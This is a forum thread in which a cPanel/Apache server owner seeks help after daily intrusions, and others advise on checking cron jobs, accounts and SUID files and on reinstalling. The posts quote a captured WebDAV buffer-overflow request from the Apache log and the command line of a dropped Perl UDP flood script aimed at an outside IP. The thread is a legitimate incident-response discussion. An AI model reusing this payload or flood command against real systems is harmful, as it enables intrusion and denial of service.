LinuxQuestions.org - Server Attack...every day, help:(

- Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)

- - Server Attack...every day, help:( (https://www.linuxquestions.org/questions/linux-security-4/server-attack-every-day-help-205751/)

Server Attack...every day, help:(

Hello,
every day somebody attack my server and put some files in my /var/tmp and /tmp/ directory and execute (on my serevr I have cPanel/WHM), I search in logs (usr/local/apache/domlogs and var/log) how he do that but I can`t find, only what I find today in domlogs is this code, what is this and can he do that with this code, how I can protect my server if he do that with this code:
66.79.55.12 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
.
.
etc.
etc.
etc.
much more...and at end of this code is this:
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 354 "-"
"-"

Please somebody help me...this is big problem for me.
Thanks!

the best thing you can do is backup your important config files, webpages format and reinstall the OS.

Read through the security refs on this forum to harden your os. ensure you connect your system to the net only after it is properly patched up, the firewall has opened only the ports that you need for your Internet presence.

But, I check my system with chkrootkit, rkhunter and with Panda free antivirus software and I don`t find trojans, viruses...nothing...

Some other way?

Thanks

Looks like the Apache log enty is and IIS WebDav exploit, and it's probably not related to the files in /var/tmp or /tmp. What are the files in those directories? I wouldn't go so as re-installing unless you know that you have a problem that can't be easily undone.

No, I don`t use IIS, on my server I use Linux/Apache....
Every day he put and execute in var/tmp files "vadimI", "f3", "sh" and some more names...I have copy of that files on my HD...that files use much CPU...
Also, he create directory in var/tmp with names like "....", ".c", ".x"....

But I can`t find that files in logs, how he run it, copy on that location....?

First, you should definitely disconnect the system from the internet.

As a stickman pointed out, the buffer overflow you've posted is a common IIS WebDAV exploit and is likely un-related to the files. In fact, if the files are appearing every day, it sounds like they're being created locally by a cron job or something in the init process if your rebooting daily, so definitlely take a look at cron and cronttab. You should probably also take a look at the /etc/passwd file and see if you have any odd users and especially look for users other than root with a UID of 0. Try searching for strange SUID files (find / -perm -4000 -print) and SGID files (find / -perm -2000 -print) as well.

One thing to keep in mind, is that rootkits are really only tools used primarily to hide the presence of a cracker. So it's entirely possible to crack a system and never use a rootkit at all, it just makes the job of hiding a little easier.

Even if you do determine that the system has been cracked, remove the files and prevent their re-creation, you will need to re-install from trusted media. If the systems security has been compromised, it's extremely difficult to be sure that no other files are lurking somewhere else in the file system. When you re-install, look into running a file integrity IDS like tripwire, aide, samhain, etc. With one of these installed, you'll more than likely be able to determine what files have been added to the system or if any critical files have been altered, using a single command.

I think that I find where is problem!
In "/etc/cron.daily" dir I find much files:
00-logwatch@
logrotate*
rpm*
0anacron*
makewhatis.cron*
slocate.cron*
tmpwatch*

Is this normal? Do you have tmpwatch* ?
When I edit that file I find this:
/usr/sbin/tmpwatch 240 /tmp
/usr/sbin/tmpwatch 720 /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
if [ -d "$d" ]; then
/usr/sbin/tmpwatch -f 720 $d
fi
done

When I search on google "tmpwatch" first result is:
"tmpwatch has a local denial of service and root exploit"

Is this problem?
What now?:(

The contents of cron.daily are pretty normal, except the * and @ characters after the filenames, what linux distro are you using?. Also, don't forget to check crontab as well.

Tmpwatch is a normal linux application which is used to blow away tmp files that aren't being used. For more info, checkout the tmpwatch man page.

Have you looked into any of the other advice I've given?

Today he add and run new file in var/tmp "udp.pl"!
Also, this use much CPU, when I click on "CPU/Memory/MySQL Usage" in WHM I see this:
Top Process %CPU 89.0 /usr/bin/perl ./udp.pl 200.222.175.87 139 1

Here is copy of header (udp.pl):
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

Also, how he run this script for other scripts like ikonboard I see this for same user:
Top Process %CPU 67.0 /usr/bin/perl ikonboard.cgi

no "./ikonboard.cgi"!!!

Here is crontab -e output:
2,58 * * * * /usr/local/bandmin/bandmin
0 0 * * * /usr/local/bandmin/ipaddrmap
31 5 * * * /scripts/upcp
*/15 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
0 6 * * * /scripts/cleanmsglog > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim callout > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim retry > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim reject > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim wait-remote_smtp > /dev/null 2>$
*/5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1

etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash

and users all "username:x:3xxxx:3xxxx::/home
(xxxx is some number)

find / -perm -4000 -print:
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/quota
/usr/bin/crontab
/usr/bin/lppasswd
/usr/local/apache/bin/suexec
/usr/local/cpanel/bin/cpwrap
/usr/local/cpanel/bin/jailshell
/usr/local/cpanel/cgi-sys/scgiwrap
/usr/sbin/exim
/usr/sbin/traceroute
/usr/sbin/suexec
/bin/su
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/24270/fd/4: No such file or directory
find: /proc/24586/fd: No such file or directory

find / -perm -2000 -print:
/var/cpanel/users
/usr/bin/wall
/usr/bin/slocate
/usr/local/cpanel/3rdparty/mailman
/usr/local/cpanel/3rdparty/mailman/Mailman
/usr/local/cpanel/3rdparty/mailman/Mailman/Archiver
/usr/local/cpanel/3rdparty/mailman/Mailman/Bouncers
/usr/local/cpanel/3rdparty/mailman/Mailman/Cgi
/usr/local/cpanel/3rdparty/mailman/Mailman/Handlers
/usr/local/cpanel/3rdparty/mailman/Mailman/Logging
/usr/local/cpanel/3rdparty/mailman/Mailman/Queue
/usr/local/cpanel/3rdparty/mailman/Mailman/MTA
/usr/local/cpanel/3rdparty/mailman/Mailman/Gui
/usr/local/cpanel/3rdparty/mailman/Mailman/Commands
/usr/local/cpanel/3rdparty/mailman/archives
/usr/local/cpanel/3rdparty/mailman/archives/private
/usr/local/cpanel/3rdparty/mailman/archives/private/aa_cpanel3.darkorb.net.mbox
/usr/local/cpanel/3rdparty/mailman/archives/private/mailman.mbox
/usr/local/cpanel/3rdparty/mailman/archives/private/mailman
/usr/local/cpanel/3rdparty/mailman/archives/public
/usr/local/cpanel/3rdparty/mailman/bin
/usr/local/cpanel/3rdparty/mailman/cgi-bin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/handle_opts
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb
/usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml
/usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe
/usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo
/usr/local/cpanel/3rdparty/mailman/cgi-bin/options
/usr/local/cpanel/3rdparty/mailman/cgi-bin/private
/usr/local/cpanel/3rdparty/mailman/cgi-bin/roster
/usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm
/usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist
/usr/local/cpanel/3rdparty/mailman/cron
/usr/local/cpanel/3rdparty/mailman/data
/usr/local/cpanel/3rdparty/mailman/filters
/usr/local/cpanel/3rdparty/mailman/icons
/usr/local/cpanel/3rdparty/mailman/lists
/usr/local/cpanel/3rdparty/mailman/lists/mailman
/usr/local/cpanel/3rdparty/mailman/locks
/usr/local/cpanel/3rdparty/mailman/logs
/usr/local/cpanel/3rdparty/mailman/mail
/usr/local/cpanel/3rdparty/mailman/mail/mailman
/usr/local/cpanel/3rdparty/mailman/qfiles
/usr/local/cpanel/3rdparty/mailman/qfiles/virgin
/usr/local/cpanel/3rdparty/mailman/qfiles/bounces
/usr/local/cpanel/3rdparty/mailman/qfiles/shunt
/usr/local/cpanel/3rdparty/mailman/qfiles/commands
/usr/local/cpanel/3rdparty/mailman/qfiles/archive
/usr/local/cpanel/3rdparty/mailman/qfiles/in
/usr/local/cpanel/3rdparty/mailman/qfiles/out
/usr/local/cpanel/3rdparty/mailman/qfiles/news
/usr/local/cpanel/3rdparty/mailman/qfiles/retry
/usr/local/cpanel/3rdparty/mailman/scripts
/usr/local/cpanel/3rdparty/mailman/spam
/usr/local/cpanel/3rdparty/mailman/templates
/usr/local/cpanel/3rdparty/mailman/templates/big5
/usr/local/cpanel/3rdparty/mailman/templates/cs
/usr/local/cpanel/3rdparty/mailman/templates/de
/usr/local/cpanel/3rdparty/mailman/templates/en
/usr/local/cpanel/3rdparty/mailman/templates/es
/usr/local/cpanel/3rdparty/mailman/templates/et
/usr/local/cpanel/3rdparty/mailman/templates/eu
/usr/local/cpanel/3rdparty/mailman/templates/fi
/usr/local/cpanel/3rdparty/mailman/templates/fr
/usr/local/cpanel/3rdparty/mailman/templates/gb
/usr/local/cpanel/3rdparty/mailman/templates/hu
/usr/local/cpanel/3rdparty/mailman/templates/it
/usr/local/cpanel/3rdparty/mailman/templates/ja
/usr/local/cpanel/3rdparty/mailman/templates/ko
/usr/local/cpanel/3rdparty/mailman/templates/lt
/usr/local/cpanel/3rdparty/mailman/templates/nl
/usr/local/cpanel/3rdparty/mailman/templates/no
/usr/local/cpanel/3rdparty/mailman/templates/pl
/usr/local/cpanel/3rdparty/mailman/templates/pt
/usr/local/cpanel/3rdparty/mailman/templates/pt_BR
/usr/local/cpanel/3rdparty/mailman/templates/ru
/usr/local/cpanel/3rdparty/mailman/templates/sr
/usr/local/cpanel/3rdparty/mailman/templates/sv
/usr/local/cpanel/3rdparty/mailman/templates/uk
/usr/local/cpanel/3rdparty/mailman/templates/ca
/usr/local/cpanel/3rdparty/mailman/templates/hr
/usr/local/cpanel/3rdparty/mailman/templates/ro
/usr/local/cpanel/3rdparty/mailman/templates/sl
/usr/local/cpanel/3rdparty/mailman/templates/tr
/usr/local/cpanel/3rdparty/mailman/pythonlib
/usr/local/cpanel/3rdparty/mailman/pythonlib/email
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/python
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/c
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/mappings
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/aliases
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2/site-packages
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/mappings
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/c
